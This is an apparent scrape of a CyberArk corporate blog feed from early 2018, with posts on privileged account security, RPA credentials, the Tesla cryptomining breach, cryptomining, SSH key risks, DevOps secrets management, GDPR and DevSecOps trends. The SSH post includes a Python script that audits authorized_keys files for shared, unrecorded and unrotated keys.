Fear not! We’ve broadened integrations between our solutions to protect your privileged haystack from external attackers and malicious insiders alike. Our session management and threat analytics solutions have been expanded to now include the automatic suspension of a privileged session as well as a detailed audit of Software-as-a-Service (SaaS) and other (web or client) applications. I could throw in more Irish Proverbs here but I’ll save you that and ask you to watch the following demo video to see automatic risk-based session suspension in action. This new capability allows our customers to pre-define risky activities, automatically suspend the session and enable their security operations team to manually resume it when it’s evident that the activity presents no material threat to the organization.

Furthermore, we’ve extended session management connection components to support the Google Chrome browser and secure connections for a wider range of applications that are tied to that browser specifically. For threat detection, CyberArk can now detect both attackers attempting to take over an account and reset passwords, and rogue IT employees who want to bypass organizational policy and take control over the accounts under management. This is the latest addition to the ever-growing list of real-time detection capabilities for malicious attempts to bypass privileged account security controls.

To simplify the onboarding of privileged accounts, our customers now have the ability to create automatic onboarding rules directly within the new user interface to automatically onboard accounts from both ‘Accounts Discovery’ and from the ‘Add Pending Accounts’ REST API, as well as backdoor accounts detected by CyberArk Privileged Threat Analytics. To see how this takes shape, watch the demo video.

In terms of managing privilege, we’ve incorporated a comprehensive health dashboard that provides detail on the overall health of the infrastructure and individual components, with drill down functionality for Vault administrators looking to get into the minutia (e.g. list of installed components, component identifiers, IP addresses, connectivity status, etc.). This feature enables users to identify specific instances of each CyberArk component and provide them with the details they need to get an end-to-end view of system health. Furthermore, we’ve automated Microsoft patching on the CyberArk Digital Vault with strong security throughout the process to make the system more secure during a patch update. This reduces deployment friction and complexity around Microsoft patching and through this automation, we can now make it a part of routine operations for the IT team.

Irish Proverb #2 – It’s Easy to Halve the Potato Where There’s Love

Okay so there are no potatoes involved here but there’s plenty of love between the CyberArk Privileged Account Security Solution and CyberArk Conjur, our DevOps secrets management solution. By the end of this month, CyberArk’s Enterprise Password Vault (v9.5 and up) will officially be integrated with CyberArk Conjur providing a way to synchronize secrets that are managed in the Vault with Conjur. CyberArk customers who store and manage their credentials in the Vault will benefit from CyberArk Conjur’s capabilities in serving up secrets for applications built on containers leveraging DevOps methodologies. The powerful combination of CyberArk Enterprise Password Vault and Conjur delivers immediate value to the install base and enables central policy enforcement for DevOps use cases such as secrets rotation, monitoring, and auditing that is consistent with enterprise policy. Additional details are available here.

And the love doesn’t end there. For endpoint protection, we now support the ability to manage local privileged credentials on the endpoint that are not directly connected to the corporate network. Through tight integration with the Enterprise Password Vault, this new capability ensures security and operational policies are met for privileged credential protection for workstations – including “loosely connected” endpoints that only connect to the corporate network intermittently. Lastly, we’ve made several enhancements to our industry leading credential theft protection including the ability to block credential attacks in the Microsoft Windows Internet Explorer and Edge browsers and the Windows Credential Manager. Learn more by visiting the CyberArk Endpoint Privilege Manager webpage.

Irish Proverb #3 – A New Broom Sweeps Clean, but an Old One Knows the Corners

When it comes to security, you can’t beat experience and when it comes to experience, no one beats CyberArk. We’ve seen more and done more in privileged account security than any other vendor. The v10.2 release is another example of our dedication to innovation and continual investment in research and development. We’ve also included many specific customer requests of which we’ve prioritized and implemented – you’ve asked and we’ve heard you! These new features and capabilities continue to strengthen our position as the #1 undisputed leader in the privileged account security market.

Interested in learning more about the latest version of CyberArk Privileged Account Security Solution?  Register for our webcast to hear more about some of these exciting new capabilities in greater detail.

]]>
How Robotic Process Automation Can Put You at Risk https://www.cyberark.com/blog/power-potential-robotic-process-automation-security-risks/ Wed, 07 Mar 2018 15:15:39 +0000 https://www.cyberark.com/?p=22994/

Robotic Process Automation (RPA) is a powerful, emerging technology and a hot topic of conversation. Despite the buzz, many people remain fuzzy on understanding the specifics. Does RPA mean that organizations will soon employ armies of futuristic robots to do the work that humans once did (remember the movie I, Robot)?

Not quite. Let’s start with a definition. RPA is “the use of software with artificial intelligence and machine learning capabilities to handle high-volume tasks that previously required a human to perform.” In other words, RPA uses “software robots” to automate much of the manual “hand work” involved in daily business, such as entering data (invoices, POs, etc.) from one application into another. What RPA does NOT focus on is the “head work,” or cognitive automation, required to extract information from unstructured sources.  This is the work—and irreplaceable value—of humans in the organization. RPA is not meant to replace employees, but rather, allow them to leverage their experience and capabilities and focus their efforts on business-critical work. RPA simply fills in the gaps—providing 24×7, cross-geography support for time-consuming, repetitive tasks.

Here’s how a typical task could be automated by a “software robot:”

First, a single manual process is used to create a business process flow. The robots would then record that process. From there, any necessary rules, policies or exceptions to that process are identified and assigned to humans to manage.  The robotic process is put into production and repeated over and over again. Throughout this loop, corrective actions are made to continuously refine the process and maximize operational efficiency, productivity and cost-savings.

RPA and Privilege Connection

So what do IT security professionals need to know about RPA platforms and the connection to privileged credentials? Simply put, it is a new attack vector and organizations need to protect the powerful, privileged accounts within these RPA platforms.

Because RPA software interacts directly with business applications and mimics the way applications use and mirror human credentials and entitlements, this can introduce significant risks when the software robots automate and perform routine business processes across multiple systems.

To minimize these risks, securing robotic credentials is paramount. In order to automate processes within an environment, software robots need “power access” (or privileged access) to carry out their mission—whether it be logging into a system(s) to access data or moving a process from step A to step B. This results in a large amount of credentials being stored in the application. An attacker that gains access to the RPA password storage location and cracks the proverbial “password piñata,” can then take the credentials, and ultimately, take control of the robots. Just like any other compromised commercial off-the-shelf (COTS) application, attackers can leverage these powerful credentials to do their bidding—but with RPA, it’s at an even greater scale. Most organizations employ multiple—sometimes hundreds or even thousands of—software robots, which access multiple systems and perform multiple processes simultaneously. With this in mind, you can appreciate the magnitude of risk to the enterprise.

Locking Down RPA Credentials

CyberArk solves the privileged access security challenge for both human and application users.  Through the C3 Alliance, we’ve partnered with some of the world’s leading RPA players, including Automation Anywhere, BluePrism, WorkFusion and UiPath, to provide a simple, easy-to-deploy and cost effective solution to this growing security challenge. This best-in-breed credential management solution:

  • Implements and manages a unique account for every target system that needs to be accessed by a robot: This eliminates the need to put a powerful credential, such as a domain credential, into the application’s server for the robots to leverage. Additionally, if a system is breached, the breach will only affect that particular system—there will not be a larger, ripple effect across multiple systems.
  • Securely stores and retrieves credentials: Instead of storing credentials within the application, robots can request credentials from CyberArk’s centralized, encrypted vault, as needed, via CyberArk Application Identity Manager, to perform their necessary tasks.

Here’s an illustration of this in action:

Interested in learning more about securing RPA with CyberArk? Watch a recent, on-demand webinar, which outlines what IT security professionals need to know about RPA platforms and the connection to privileged credentials. And for further reading, discover five RPA security best practices for privileged credentials and access, and download the “The CISO View: Protecting Privileged Access in Robotic Process Automation.”


]]>
Want to Understand What’s Really Happening on Your Network? Try Kerberos Decryption. https://www.cyberark.com/blog/want-understand-whats-really-happening-network-try-kerberos-decryption/ Tue, 06 Mar 2018 18:06:42 +0000 https://www.cyberark.com/?p=22957/

Using Kerberos decryption, it is possible to bridge the gap between attackers and the defenders by providing a real view into active attacks that leverage Kerberos as a means to conceal malicious activity and lateral movement. In a new research whitepaper, CyberArk Labs unveils the potential risk within hidden parts of Kerberos.

To help you better understand Kerberos traffic and illustrate the details in the paper, we have developed a tool called NetRay hosted on github. After you read the whitepaper, we encourage you to download and run this tool and modify as you see fit.

As part of our On the Front Lines webinar series, we have a session on Tuesday, March 6th where we will discuss highlights of this research. To join this webinar or view the recording later, please go to this registration page.

We look forward to your feedback on this research and tool. We hope you’ll share your experiences as you explore your Kerberos encrypted network traffic. Happy Decrypting!

]]>
Where Rubber Meets the Road: Exposed Credentials in DevOps Tools Facilitate Cryptocurrency Mining https://www.cyberark.com/blog/rubber-meets-road-exposed-credentials-cloud-facilitate-cryptocurrency-mining/ Fri, 02 Mar 2018 16:37:03 +0000 https://www.cyberark.com/?p=22860/

Cloud and DevOps enable powerful, transformational advances across many businesses – from finance to manufacturing. But, what happens when a cyber attacker gets a hold of the access keys to the cloud account of a leading automobile manufacturer? Well, as learned in the recently reported breach at Tesla, the attackers exploited access to mine for cryptocurrency!

Reportedly, attackers discovered an unprotected DevOps tool belonging to Tesla. In this case it was a Kubernetes console that exposed AWS Access Keys. With these credentials, the attackers gained access to Tesla’s cloud environment. Once the attackers had the AWS Access Keys, they were able to set up scripts to mine for cryptocurrency using the stolen compute resources.

Cryptocurrency mining using a hacked cloud account is becoming increasingly popular with hackers, especially given the recent increases in cryptocurrency values – it’s viewed as an easy route to monetize an attack. But this type of attack could have been worse. Once the attackers have the access keys, they can access other cloud resources, copy sensitive data, and do other damage to the enterprise’s cloud workloads.

Unprotected DevOps Tools – A Growing Vulnerability

This breach serves as a powerful warning to prioritize management of the access and credentials for the DevOps and automation tools used throughout the CI/CD pipeline.

Three Key Takeaways from the Tesla Breach

  1. Protect your cloud credentials and access keys. Cloud credentials, such as AWS Access Keys, are very powerful. In the wrong hands they give unauthorized access to compute resources and sensitive data. Essentially, the access keys and cloud management console really do hold the keys to the cloud kingdom.
  2. Proactively check if your cloud resources are being used for cryptocurrency mining. Because cloud compute resources are powerful and can be assigned dynamically, they are attractive targets for cryptocurrency miners. Cryptocurrency mining enables attackers to readily monetize their attack, at the enterprises’ expense (The attacker gets the cryptocurrency, and the enterprise pays the compute bill). As with other attacks, it may be a while before the enterprise detects the problem.
  3. Protect the admin consoles for all your DevOps and other automation tools. DevOps tools admin consoles can be potential vulnerabilities and act as entry points that need to be protected. With DevOps pipelines comprising multiple tools there are multiple potential entry points.

Organizations Must Proactively Secure DevOps and Cloud Environments

Whether your enterprise fully embraces DevOps or is just starting to adopt automation and DevOps, it is clear that the credentials for the admin consoles for DevOps and automation tools need to be secured and managed. The potential risks of cryptocurrency mining can be greatly reduced by maintaining basic cyber hygiene best practices to address and secure DevOps and cloud environments. Risk management for CI/CD pipelines and the cloud needs to be prioritized with the same, consistent policy enforcement that organizations use on-premises.

Securing the admin consoles for an organization’s DevOps and automation tools, along with its cloud management consoles, is a basic first step.

As a next step, consider attending a CyberArk DevOps workshop, talking to one of our DevOps experts, scheduling a demo, or starting to use CyberArk Conjur open source edition by following the “Simple Steps to Protect Your DevOps Tools from Cryptocurrency Miners” outlined in the technical blog on Conjur.org.

]]>
Survey Says Organizational Inertia Weakens Cyber Security Defenses https://www.cyberark.com/blog/survey-says-organizational-inertia-weakens-cyber-security-defenses/ Wed, 28 Feb 2018 13:00:33 +0000 https://www.cyberark.com/?p=22775/

Inertia, by definition, indicates resistance to speed, direction or motion. It can creep in over a period of time and become an established behavior in an organization. The CyberArk Global Advanced Threat Landscape Report 2018 found specific examples of cyber security inertia which, if not addressed, could hinder an organization’s ability to detect and contain threats that break through the perimeter.

A key finding of our 2018 report is that nearly half (46 percent) of organizations rarely make substantial changes to security strategy—even after being hit by a cyber attack. This represents a failure to learn from past incidents that puts sensitive data, infrastructure and assets at risk; a consequence that respondents recognized, with the same proportion—46 percent—saying their organization can’t always prevent attackers from breaching internal networks.

Another worrying discovery is that more than a third (36 percent) of organizations store usernames and passwords for privileged user accounts in Word or Excel documents on company PCs. These privileged credentials deliver fast-track access to networks and systems across the enterprise, making them a tempting target for attackers.

Speaking of raising the odds of an attack succeeding, we were surprised to find a growing number of organizations grant users administrative rights on their endpoint devices. This year, the report found that, on average, 87 percent of users are allowed these rights, a 25 percent jump versus our 2016 study. With advanced malware attacks over the past year, such as WannaCry and NotPetya, greater prioritization around blocking credential theft is necessary to prevent attackers from gaining access to the network and initiating lateral movement.

The threat landscape is dynamic, so inertia will ultimately lead to serious consequences. Consider this finding: Half (50 percent) admit that their customers’ sensitive private data is at risk because security controls don’t exceed the legally required basics. In light of the EU’s General Data Protection Regulation (GDPR) and similar legislation in other countries around the world, the need for robust, organization-wide security and data integrity practices has never been more prominent.

Removing inertia requires businesses to build and sustain a pervasive culture of cyber security that is driven by executives and the board. This should be a top-down initiative supported by clearly defined and communicated security strategies and actively executed with participation by employees company-wide.

Read more by downloading the full report here.

]]>
Five Things to Know about Cryptomining https://www.cyberark.com/blog/five-things-know-cryptomining/ Mon, 26 Feb 2018 17:07:08 +0000 https://www.cyberark.com/?p=22716/

Does it feel like your computer is running (or rather, crawling) slowly? You may be a victim of cryptomining—cyber criminals’ latest tool du jour. A couple of weeks ago, Reuters reported that thousands of websites, including ones run by U.S. and UK government agencies, were infected with cryptomining code. As we covered recently, many enterprising hackers also use this attack method to take advantage of the surge in online viewing activity around high-profile events such as the 2018 Winter Olympics.

Cryptomining may be the latest cyber attack on the rise, but what is it, exactly? According to MIT Technology Review, “Mining is a computationally intensive process that computers comprising a cryptocurrency network complete to verify the transaction record, called the blockchain, and receive digital coins in return.” In other words, “miners” work to solve complex mathematical problems in order to generate income in the form of digital currency, such as Bitcoin, Ethereum, Monero and others. This mining process requires serious hardware and significant CPU resources to “create” cryptocurrency.

To put this in perspective, a representative from Hitaveita Sudurnesja, an energy company in Iceland, said he expected “Iceland’s virtual currency mining to double its energy consumption to about 100 megawatts this year.” This is significantly more than what is used by the country’s entire population of 340,000.

Five Things to Know about Cryptomining:

  1. How Cryptomining Malware is Executed: Malicious cryptomining typically spreads in one of two ways. The first approach is by malware, delivered via a malicious email attachment or link. Researchers found that 23% of organizations globally were affected by cryptomining malware, specifically the Coinhive variant, during January 2018. The second approach is to infect third-party content providers used by high-traffic sites. For example, an advertising provider might be targeted because of its access to thousands of websites reaching millions of people. This method can deliver a more substantial return for the attacker. When users visit the site, they unknowingly “donate” their computing processing power to the attacker while they remain on the page. These attacks don’t require, or spread, malware on the user’s endpoint, so while users are impacted, they are not infected.
  2. How the Attacker Uses Power from your Device: By using crowd-sourced computing power, the attacker can scale up his/her mining efforts while eliminating the need to purchase expensive equipment as they “pan for digital gold.” The more collective power and speed the attacker can amass, the bigger the cryptocurrency payout.
  3. How to Tell If You’ve Been Hit: In most cases, you won’t find malware on your device, since this type of attack can run without it, so the only indication may be a visible slowdown in performance.
  4. Why It’s a Big Deal: What’s so concerning about this type of attack is that user computing power can now be hijacked by attackers just by visiting an infected site or a site that uses an infected third party.
  5. How to Protect Your Devices: Unfortunately, there is little you and other end users can do except monitor for abnormal utilization of browser processes (not trivial for non tech-savvy users) and higher than normal CPU usage. Instead, the responsibility should rest with those who own and maintain the website to routinely inspect all of their third-party providers.

Cryptomining operations will continue and likely expand. We already see reports of mining of Monero using malware installed on internet-connected servers. This is another reason to stay on top of vulnerabilities and the performance of your systems.

]]>
Four SSH Vulnerabilities You Should Not Ignore https://www.cyberark.com/blog/four-ssh-vulnerabilities-you-should-not-ignore/ Fri, 23 Feb 2018 05:00:52 +0000 https://www.cyberark.com/blog//

The Secure Shell (SSH) protocol was created in 1995 by a researcher from the University of Helsinki after a password-sniffing attack. SSH is the tool of choice for system admins and is used throughout traditional and virtual datacenter environments to enable secure remote access to Unix, Linux and sometimes Windows systems. You can think of the SSH key, which enables this remote access, as a “Swiss Army Knife” for IT teams in that it helps administrators and developers authenticate to systems, build authentication into systems and applications and encrypt the resulting traffic between its users and systems.

During the authentication process, these SSH keys often establish direct, privileged or root access to a variety of critical systems, effectively turning these cryptographic assets into privileged credentials. SSH keys are granted the same access as passwords, but when most people think about securing their privileged credentials, they forget about SSH keys. As a result, these keys can easily fall into the wrong hands and, instead of protecting access to important assets, these keys can become “virtual skeleton keys.” To make matters worse, when an attacker gains access to one privileged SSH key, she or he can access every SSH key stored on that machine and spider the entire company network, often gaining access to all company data. As few as five to 20 unique SSH keys can grant access to an entire enterprise through transitive SSH key trust, providing attackers with privileged access to the organization’s most sensitive systems and data.

Four SSH vulnerabilities you should not ignore:

  1.  SSH Key Tracking Troubles. It’s not uncommon for a typical large enterprise with 10,000+ servers to have more than one million SSH keys – making it incredibly difficult, if not impossible, to find and manage each key. Organizations typically accumulate large numbers of SSH keys because end users can create new SSH keys (credentials) or even duplicate them without oversight, unlike certificates or passwords. Once a large number of SSH keys are built up over time, an organization could, for example, easily lose track of these credentials when development servers are migrated into production environments (assuming the development environment credentials are not scrubbed) or when employees leave the company and their keys are not changed. The result? SSH keys left unaccounted for can provide attackers with long-term privileged access to corporate resources. If attackers gain access to a key that is never revoked or rotated, the attackers could have a permanent network entry point and impersonate the user that the SSH key originally belonged to.
  2. When it Comes to SSH Keys, Sharing Isn’t Caring. For the sake of efficiency, SSH keys are often shared or replicated across a common group of employees or servers and infrastructure components. As noted above, as a result of SSH key duplication, as few as five to 20 unique keys can grant access to all machines throughout an enterprise. This approach may make IT teams’ jobs easier in the short-term, but it also makes attackers’ lives easier in the long-term. SSH key duplication creates complicated, many-to-many private/public key mappings that significantly reduce security because it is difficult to rotate and revoke a single key without breaking untold other SSH key relationships that share the same key fingerprint. SSH key sharing is also dangerous because it reduces auditability and nonrepudiation.
  3. Static SSH Keys, Because “Ain’t Nobody Got Time for Rotation!” It’s easy to see how rotating one million plus SSH keys would be a logistical nightmare. Many IT administrators and security professionals rarely change and re-distribute keys for fear that a critical component or employee may be forgotten (which could mean anything from a simple inconvenience for a single employee to a major company-wide system outage). These factors typically result in a surge of static SSH keys, opening the door for attackers to compromise an unchanged key, use it to move laterally through the enterprise and gain permanent, unauthorized access to sensitive data and assets.
  4. Embedded SSH Keys – The Ones No One Wants to Mess With. SSH keys are frequently embedded within applications or scripts. Administrators are often fearful of changing them as they do not understand the code the keys are embedded in or are strongly discouraged from rotating them because of the level of coordination required to prevent system outages. As a result, static SSH keys embedded in applications, code and scripts can lead to persistent backdoors for attackers.
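The first three problems above (unaccounted keys, keys duplicated across hosts, and keys that are never rotated) can be surfaced with a small inventory audit. The script below is an added example, not CyberArk’s code or tooling: it fingerprints every key in a set of authorized_keys files, then reports keys present on more than one host, keys missing from an approved inventory, and keys whose inventory date exceeds a rotation threshold. The host names, authorized_keys contents, inventory dates and the 90-day threshold are constructed assumptions, and the key blobs are placeholders rather than real public keys.

```python
import base64
import hashlib
from datetime import date
from typing import Dict, List, Set, Tuple


def fingerprint(key_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint: base64(sha256(blob)) with '=' padding removed."""
    blob = base64.b64decode(key_b64)
    digest = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return "SHA256:" + digest


def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """Return (key_type, fingerprint, comment) for every key line in an authorized_keys file.

    Blank lines and '#' comments are skipped. A leading options field (for example
    from="..." or command="...") is tolerated by locating the key-type token. Option
    values containing whitespace are not handled by this simple split (noted limitation).
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        idx = next((i for i, f in enumerate(fields)
                    if f.startswith("ssh-") or f.startswith("ecdsa-")), None)
        if idx is None or idx + 1 >= len(fields):
            continue  # not a recognisable key line
        key_type, key_b64 = fields[idx], fields[idx + 1]
        comment = " ".join(fields[idx + 2:])
        try:
            fp = fingerprint(key_b64)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue  # malformed blob: skip rather than crash the audit
        entries.append((key_type, fp, comment))
    return entries


def audit(hosts: Dict[str, str], inventory: Dict[str, date], today: date,
          max_age_days: int = 90) -> Dict[str, dict]:
    """Cross-host audit of authorized_keys contents.

    hosts:     host name -> authorized_keys file text
    inventory: fingerprint -> date the key was issued or last rotated (approved keys only)
    Returns findings keyed 'shared' (fingerprint -> hosts), 'unknown' (fingerprint -> hosts)
    and 'stale' (fingerprint -> age in days) for keys seen on at least one host.
    """
    where: Dict[str, Set[str]] = {}
    for host, text in hosts.items():
        for _, fp, _ in parse_authorized_keys(text):
            where.setdefault(fp, set()).add(host)
    shared = {fp: sorted(h) for fp, h in where.items() if len(h) > 1}
    unknown = {fp: sorted(h) for fp, h in where.items() if fp not in inventory}
    stale = {fp: (today - issued).days for fp, issued in inventory.items()
             if fp in where and (today - issued).days > max_age_days}
    return {"shared": shared, "unknown": unknown, "stale": stale}


def constructed_blob(label: str) -> str:
    """Constructed placeholder key material (a real line carries the actual public key blob)."""
    return base64.b64encode(("demo-key-" + label).encode()).decode()


# Constructed sample inventory: one deploy key copied to every server, one personal key,
# and one contractor key nobody recorded.
KEY_A = constructed_blob("deploy-shared")
KEY_B = constructed_blob("alice-workstation")
KEY_C = constructed_blob("old-contractor")

SAMPLE_HOSTS = {
    "web01": f"ssh-ed25519 {KEY_A} deploy@ci\nssh-ed25519 {KEY_B} alice@laptop\n",
    "web02": f"# managed by config management\nfrom=\"10.0.0.0/8\" ssh-ed25519 {KEY_A} deploy@ci\n",
    "db01": f"ssh-ed25519 {KEY_A} deploy@ci\nssh-rsa {KEY_C} contractor@2016\n",
}
TODAY = date(2018, 2, 23)
INVENTORY = {fingerprint(KEY_A): date(2017, 6, 1), fingerprint(KEY_B): date(2018, 1, 15)}

if __name__ == "__main__":
    findings = audit(SAMPLE_HOSTS, INVENTORY, TODAY)
    for fp, hosts in findings["shared"].items():
        print(f"SHARED  {fp} on {', '.join(hosts)}")
    for fp, hosts in findings["unknown"].items():
        print(f"UNKNOWN {fp} on {', '.join(hosts)} (not in inventory)")
    for fp, age in findings["stale"].items():
        print(f"STALE   {fp} last rotated {age} days ago")
```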

SSH keys can present a tremendous opportunity for hackers to gain privileged access to networks, stay connected, impersonate legitimate users, hide their activity with encryption and move freely. To learn about SSH key challenges and best practices for mitigating associated risks while improving your overall security posture, visit our website. And to learn more about our comprehensive secrets management tool to help secure SSH keys, credentials and other secrets used by applications and machines, check out this blog post.


Editor’s Note: This article has been updated. It was originally published April, 2016.

]]>
How Secure is Your Continuous DevOps Pipeline? https://www.cyberark.com/blog/pwc-cyberark-continuous-devops-pipeline-continuously-secure/ Wed, 21 Feb 2018 20:36:46 +0000 https://www.cyberark.com/?p=22617/

Code fast, beat the competition to market and build market share. This is the value of DevOps.  Businesses around the world fuse software development, integration, test and operations practices to accelerate digital transformation and enhance business performance and agility. In fact, research shows that agile firms grow revenue 37 percent faster and generate revenues 30 percent higher than firms that have not embraced DevOps[i].

But, are these organizations missing a critical step?

Many developer and operations teams have “settled their differences” to leverage countless containers, applications and virtual machines in order to move and produce at unprecedented scale and speed.  Now, some organizations struggle to answer critical security-related questions about these new processes, such as:

  • Who—or what—has access to these virtual machines and applications?
  • Where are the secrets and credentials stored?
  • Is our continuous CI/CD pipeline continuously secure?

DevOps Introduces New Security Challenges

As we’ve explored in previous posts, the DevOps pipeline comprises a diverse collection of development, integration, testing and deployment tools, people and resources. The sheer scale and diversity of this ecosystem can make it difficult to secure for three key reasons:

  • Each development and test tool, configuration management platform and service orchestration solution has its own privileged credentials, which typically are separately maintained and administered using different systems, creating islands of security.
  • Secrets (passwords, SSH keys, API keys, etc.) used to authenticate exchanges and encrypt transactions are scattered across machines and applications, making them nearly impossible to track and manage.
  • Developers often hard code secrets into executables, leaving the business vulnerable to malicious attacks and exposure of confidential data, from attackers with stolen secrets.

The proliferation of containers has exacerbated these security challenges by creating “secrets sprawl.” Consider that in any given enterprise, hundreds of VMs can easily give way to thousands or hundreds of thousands of containers—each with its own security attributes.

Secrets Management at the Speed of DevOps

PwC has deep experience in security and DevOps and recently released a new white paper focused on securing DevOps environments. PwC’s whitepaper illustrates its strong capabilities in working with enterprise clients to identify, design and deploy improved processes and technical solutions for DevOps that also include a critical element: secrets management. This whitepaper introduces PwC’s High Velocity IT solution, which is underpinned by the CyberArk Conjur secrets management solution and helps organizations reduce risk without impacting velocity. The joint solution addresses the full spectrum of tasks and activities needed to convert ideas into useful technology-centric functions. For example, outcomes could include lower delivery costs, fewer errors in production, improved agility and metrics-based continuous improvement.

CyberArk + PwC = High Velocity IT

CyberArk has an extensive business relationship with PwC—the global consulting firm has deep experience architecting and implementing CyberArk solutions. In fact, CyberArk named PwC its Global Systems Integrator of the Year Americas in 2017. PwC’s experience in working with CyberArk empowers IT organizations to efficiently manage access and authorization privileges across the DevOps pipeline, helping security teams mitigate risks and improve compliance without hindering workflows. Together, CyberArk and PwC can help organizations build a secure and agile DevOps pipeline to achieve high velocity IT.

For additional best practices from PwC and CyberArk on securing your DevOps pipeline and achieving compliance without adding roadblocks to DevOps workflows, register for our joint February 22 webinar and download the free white paper.

 [i] How business can survive and thrive in turbulent times. The Economist Intelligence Unit Ltd.

]]>
When It Comes to GDPR, Don’t Wait and See https://www.cyberark.com/blog/comes-gdpr-dont-wait-see/ Mon, 19 Feb 2018 14:25:28 +0000 https://www.cyberark.com/?p=22478/

The General Data Protection Regulation (GDPR) goes into effect in just three short months. Though it’s been a long time coming, industry reports estimate that more than 50 percent of companies affected by the GDPR will not be in full compliance with its data protection requirements by the May 25 deadline.

Many of these organizations have chosen to take a “wait and see” approach, observing how the rules will actually be enforced and who will be found in violation before they make widespread changes to their security programs. This is a misguided strategy that could result in crippling fines—up to four percent of company turnover.

Imagine, for example, if the recent Uber breach would have occurred after the GDPR went into effect. Post-breach analysis of the breach revealed a significant lack of security controls necessary to prove compliance with the regulation. This case likely would have resulted in a massive, multi-million dollar fine as it involved personal data of nearly 60 million customers and drivers and went unreported within the GDPR-mandated 72-hour timeframe.

Operational control over who has access to personal data is at the heart of complying with the GDPR. Essential to gaining that operational control is strong privileged account management. Time is indeed running short, but there is still time to address the gaps and protect your organization from financial penalties and liability by taking advantage of the tools you already have in place. Our at-a-glance matrix outlines how CyberArk customers can leverage components of the CyberArk Privileged Account Security Solution to address several key, required controls.

For other helpful checklists, solution briefs, eBooks, advisories and more, check out our library of free GDPR resources.

]]>
Who’s A CRN Channel Chief Three Years Running? CyberArk’s Scott Whitehouse https://www.cyberark.com/blog/whos-crn-channel-chief-three-years-running-cyberarks-scott-whitehouse/ Fri, 16 Feb 2018 18:51:12 +0000 https://www.cyberark.com/?p=22473/

CyberArk continues to invest in the success of its channel partners, enabling them to capitalize on new business opportunities based on the industry’s most comprehensive privileged account security solution. Scott Whitehouse leads CyberArk’s channel initiatives, and he was recently named a 2018 CRN Channel Chief for the third consecutive year!

CRN’s editorial staff selects honorees based on professional achievements, standing in the industry, dedication to the channel partner community and strategies for driving future growth and innovation.

As the Vice President of Channels and Alliances at CyberArk, Scott is responsible for field relationships with CyberArk channel partners and advisory/integration firms. His team collaborates with the Big 4 advisory firms, global systems integrators, managed service providers and value-added-resellers to launch and maintain innovative privileged account security programs that address advanced cyber threats and compliance and audit regulations.

Scott is a driving force in building strong channel relationships and delivering differentiated solutions to the channel.  Solidifying his spot on this prestigious list, Scott led several key initiatives over the past year, including:

  • Growing partnerships with key Big 4 advisory firms and driving opportunities through new and expanded technology integrations with vendors including ForeScout, SailPoint, Okta, Qualys, RSA, ServiceNow, Puppet, Chef and Ansible.
  • Generating cloud and DevOps business opportunities by increasing awareness across the channel of new CyberArk capabilities that enable customers to protect against advanced security threats by protecting privileged accounts, credentials and secrets in dynamic cloud environments and DevOps workflows.

The full list of 2018 Channel Chiefs is available here. If you get a chance, be sure to ask Scott about The Phoenix Project and why backcountry heli-skiing is on his bucket list!

]]>
DevOps Security Watch: Three Trends to Track in 2018 https://www.cyberark.com/blog/devops-security-watch-three-trends-track-2018/ Wed, 14 Feb 2018 16:31:02 +0000 https://www.cyberark.com/?p=22316/

In recent weeks, I’ve been on the road traveling with colleagues and visiting with customers and prospects. Collectively, we’ve had interesting conversations about the new and recurring risks companies face, and the tough job many face as they manage their security portfolio. I thought I’d share some of my observations and details about what I have my eye on in 2018.

Observation: The Uber breach was just a peek behind the curtain of what’s to come

The Uber breach rocked headlines in 2017, but it shouldn’t have been so surprising. Data of 57 million customers was ultimately exposed because Uber developers used an all too frequent workaround to manage credentials in a software repository, which gave hackers access to their privileged accounts. Those developers aren’t alone, and this is a peek behind the curtain of a common practice amongst developers.  There’s no simple way to securely collaborate across tools.

Organizations at large fail to make security easy for DevOps practitioners, and that causes friction and creates opportunity for failure. Developers aren’t—nor should they be expected to be—security practitioners.  They are responsible for features and functionality, not figuring out how to manage credential collaboration and security for those key assets. The Global Advanced Threat Landscape Report indicated that most organizations could not identify all the places and “workarounds” where credentials were stored, some of which are highly vulnerable. Also noted in the survey—73 percent of organizations had no strategy to address privilege account security for DevOps at all.

Unfortunately, we’ll continue to see breaches similar to Uber’s in 2018 and beyond. There’s an obvious failure in the developer user experience. Companies ask developers to manage security assets when it shouldn’t be a part of their core job function, nor do they have experience doing so. Automation will play a key role in making security more seamless, and that means making security part of developers’ native experience.

Another reason why the breach perhaps shouldn’t have been so surprising is that new research suggests Uber might not be alone in attempting to hide a breach from its customers. Part two of the Global Advanced Threat Landscape Report finds that 50 percent of organizations did not fully inform customers when their personal data was compromised in a cyber attack. Alarming, yes; surprising, maybe not so much.

Observation: 2018 will reveal security is a full-time job on the DevOps team, and there will be a new talent gap in DevSecOps

Organizations are turning to DevOps workflows to achieve transformative velocity and innovation, but they’re not prepared or staffed to manage the security of these environments. We’ll see a critical talent gap of DevSecOps practitioners as business leaders increasingly prioritize cyber security.

Many organizations simply task the same DevOps practitioners—often with no security experience—to protect these environments, in addition to the numerous other responsibilities they have to deliver. That’s no longer sufficient, especially considering the increasing threat surface in DevOps workflows and the associated risks in managing the scripts, platforms and systems used in automated workflows.

DevSecOps practitioners are in high demand. They’ll be even harder to find in 2018 as organizations realize that they have the right tools but not necessarily the right people to manage them.  Security will become a full-time job focused on DevOps workflows, and there will be few practitioners to fill that role available in the market.

Observation: Least privilege will get a facelift in the world of DevOps in 2018

Organizations are starting to understand that “identity” hasn’t been completely addressed in the full enterprise stack. There’s no common standard for machine identity, access control and management, or audit across a multiplicity of platform components. Organizations are only as safe as their weakest link. The weak link could be a VM, container or any of the dozens of platform layers that now exist across the network. As these matrices expand, they become substantially harder to control.

As a result, there needs to be a stronger definition of machine identity in highly automated systems that carry increasingly sensitive data. I predict that we’ll start to see a meaningful application of the concepts formerly used in human access management applied to machines. By forcing the DevOps team to consider and apply “Who are you, what are you, what are you asking for?” to machines—including the DevOps environment—organizations can follow security best practices and limit what machines are doing, without compromising operations. This will enable true accountability for the security posture of DevOps environments and the process of continuous delivery of least privilege in DevSecOps can become a reality.

